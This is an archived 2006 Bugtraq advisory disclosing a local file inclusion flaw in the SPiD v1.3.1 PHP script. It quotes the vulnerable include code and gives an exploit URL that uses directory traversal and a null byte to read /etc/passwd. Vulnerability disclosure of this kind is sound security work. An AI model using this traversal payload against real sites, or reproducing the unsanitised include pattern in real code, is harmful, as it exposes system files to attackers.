lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 25 Feb 2006 15:44:57 +0300 From: NSA Group <vulnerability@...g.ru> To: bugtraq@...urityfocus.com Subject: NSA Group Security Advisory NSAG-№201-25.02.2006 Vulnerability SPiD v1.3.1 Advisory: NSAG-№201-25.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: SPiD v1.3.1 Site of manufacturer: http://spid.adnx.net/ The status: 19/01/2006 - Publication is postponed. 14/02/2006 - Answer of the manufacturer is absent. 25/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/955.html Risk: Hide Description: Attacker can form the query in URL form ang get the access to the system files. Vulnerability code: +++++++ if (isset($_REQUEST["lang"])) { $file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php" if (file_exists($file_lang)) { include $lang_path . "lang.php"; include $file_lang; ..... skip +++++++ Exploit: http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00 More information: http://www.nsag.ru/vuln/955.html ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ www.nsag.ru «Nemesis» © 2006 ------------------------------------ Nemesis Security Audit Group © 2006.